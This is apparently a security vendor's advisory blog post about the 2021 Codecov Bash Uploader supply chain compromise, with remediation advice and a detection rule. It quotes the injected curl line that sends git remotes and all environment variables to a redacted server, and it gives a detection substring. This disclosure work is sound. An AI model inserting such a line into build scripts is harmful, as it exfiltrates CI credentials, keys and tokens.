The following blog was co-authored by Curt Barnard and Caitlin Condon.

On April 15, 2021, code coverage and testing company Codecov announced a supply chain compromise in which a malicious party gained access to their Bash Uploader script and modified it without authorization, enabling the attacker(s) to export CI-related information to a third-party server. The impact is dependent upon the privileges of the CI system executing the modified script, but exfiltrated information could potentially include AWS IAM keys, deploy keys, API keys, service accounts, passwords, authentication tokens, and more. The script itself is not the only impacted Codecov tool: The Codecov-actions uploader for Github, the Codecov CircleCl Orb, and the Codecov Bitrise Step are also affected. The malicious actor had access to modify the bash uploader script from Jan. 31, 2021 through April 1, 2021.

Codecov’s disclosure does not include any details on the attackers or the IP of the third-party server, the latter of which is “part of an ongoing federal investigation.” Depending on which underlying operating system privileges were in use when running the bash uploader, it is possible that an attacker could have compromised the underlying host in addition to exfiltrating sensitive information.

Guidance

According to the disclosure, Codecov sent email notifications to affected users on April 15, 2021 using the email address on file from Github, Gitlab, or Bitbucket. Affected users should immediately change or rotate all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s bash uploaders.

Codecov users can determine the keys and tokens that are used across their CI environments by running the env command in their CI pipelines. If anything returned from that command is considered private or sensitive, credentials should be invalidated immediately and new ones should be generated. The company also recommends auditing the use of these tokens. Since attackers often use compromised credentials for additional activity within affected environments, Codecov customers should examine their environments for other suspicious activity, such as unauthorized changes to build environments (e.g., malicious DLL injections) or cryptominers spun up in cloud computing environments.

Codecov’s bash script was altered as follows:

curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" https://<redacted>/upload/v2 || true

Users who use a locally stored version of a bash uploader should check that version for the following:

curl -sm 0.5 -d "$(git remote -v)

If this appears anywhere in your locally stored Bash Uploader, you should immediately replace the bash files with the most recent version from https://codecov.io/bash.

Rapid7 customers

Rapid7's detection and response teams have deployed a detection to all InsightIDR customers that identifies the execution of the known-bad update script from Codecov.io. The detection identifies the following attacker behavior:

  • Suspicious Process - Curl Passed Jenkins URL Environment Variable

We’ll update this blog post with further information as it becomes available.